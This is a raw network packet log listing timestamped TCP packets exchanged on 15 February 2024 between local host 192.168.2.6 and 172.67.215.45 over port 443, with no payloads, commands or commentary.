Feb 15, 2024 19:42:26.853491068 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.853507996 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.854135036 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.854155064 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.854195118 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.854202986 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.854213953 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.854228020 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.854509115 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.854530096 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.854566097 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.854573965 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.854592085 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.854614019 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.855084896 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.855106115 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.855138063 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.855146885 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.855171919 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.855180025 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.855552912 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.855572939 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.855607033 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.855613947 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.855632067 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.855652094 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.856340885 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.856364012 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.856396914 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.856404066 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.856426954 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.856439114 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.857240915 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.857263088 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.857291937 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.857299089 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.857321024 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.857333899 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.858094931 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.858118057 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.858146906 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.858154058 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.858171940 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.858189106 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.859039068 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.859064102 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.859097958 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.859106064 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.859123945 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.859141111 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.859920025 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.859942913 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.859980106 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.859996080 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.860012054 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.860025883 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.860896111 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.860918045 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.860949039 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.860964060 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.860977888 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.860996962 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.861521006 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.861541033 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.861567020 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.861579895 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.861592054 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.861608028 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.862257957 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.862276077 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.862306118 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.862319946 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.862349033 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.862349033 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.863388062 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.863425016 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.863442898 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.863459110 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.863471985 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.863501072 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.864248037 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.864272118 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.864310026 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.864331961 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.864342928 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.864363909 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.864912987 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.864933014 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.864968061 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.864984035 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.865021944 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.865227938 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.865250111 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.865279913 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.865288019 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.865309000 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.865324020 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.866375923 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.866419077 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.866431952 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.866442919 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.866457939 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.866478920 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.867202997 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.867223978 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.867255926 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.867268085 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.867281914 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.867305040 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.868272066 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.868303061 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.868319035 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.868335009 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.868350983 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.868361950 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.868777990 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.868799925 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.868829012 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.868838072 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.868858099 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.868872881 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.869882107 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.869909048 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.869940996 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.869951963 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.869968891 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.869988918 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.870280981 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.870300055 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.870332956 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.870341063 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.870359898 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.870376110 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.871486902 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.871510029 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.871551037 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.871562004 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.871594906 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.872313023 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.872335911 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.872365952 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.872376919 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.872394085 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.872409105 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.872642040 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.872662067 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.872694969 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.872704029 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.872725964 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.872737885 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.873527050 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.873547077 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.873575926 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.873585939 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.873604059 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.873621941 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.874456882 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.874476910 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.874521971 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.874531031 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.874562025 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.875297070 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.875319004 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.875346899 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.875356913 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.875369072 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.875389099 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.876154900 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.876180887 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.876210928 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.876220942 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.876238108 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.876245975 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.877186060 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.877209902 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.877248049 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.877259970 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.877274036 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.877291918 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.877921104 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.877935886 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.877969980 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.877979040 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.877990007 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.878007889 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.878464937 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.878488064 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.878514051 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.878520966 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.878537893 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.878559113 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.879167080 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.879184008 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.879230976 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.879242897 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.879278898 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.879606962 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.879626036 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.879652977 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.879661083 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.879678965 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.879687071 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.880289078 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.880306005 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.880347013 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.880356073 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.880386114 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.880639076 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.880655050 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.880692959 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.880700111 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.880729914 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.881787062 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.881802082 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.881845951 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.881855011 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.881896973 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.882308960 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.882324934 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.882366896 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.882378101 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.882405996 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.882710934 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.882730961 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.882755995 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.882766962 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.882780075 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.882800102 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.883153915 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.883171082 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.883210897 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.883219004 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.883249044 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.884037018 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.884053946 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.884097099 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.884105921 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.884138107 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.884665966 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.884682894 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.884720087 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.884728909 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.884769917 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.885097027 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.885119915 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.885153055 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.885160923 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.885205030 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.885230064 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.885791063 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.885809898 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.885910988 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.885910988 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.885921001 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.885962009 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.886497021 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.886514902 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.886563063 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.886571884 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.886609077 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.887162924 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.887178898 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.887217999 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.887228012 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.887262106 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.887429953 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.887447119 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.887482882 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.887490034 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.887506008 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.887522936 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.888279915 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.888295889 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.888336897 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.888345957 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.888375998 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.888997078 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.889013052 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.889055967 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.889062881 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.889094114 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.889280081 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.889297962 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.889324903 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.889333010 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.889353991 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.889368057 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.890347004 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.890368938 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.890415907 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.890427113 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.890460014 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.890791893 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.890805960 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.890853882 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.890861034 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.890892982 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.891236067 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.891256094 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.891287088 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.891294956 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.891309977 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.891330957 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.891705036 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.891720057 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.891762972 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.891768932 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.891799927 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.892719030 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.892735004 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.892771959 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.892779112 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.892812014 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.893251896 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.893269062 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.893299103 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.893307924 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.893323898 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.893340111 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.893579960 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.893598080 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.893626928 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.893634081 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.893655062 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.893670082 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.894176006 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.894193888 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.894223928 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.894232035 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.894251108 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.894267082 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.894577026 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.894597054 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.894627094 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.894634962 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.894656897 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.894671917 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.895396948 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.895415068 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.895462036 CET	49722	443	192.168.2.6	172.67.215.45
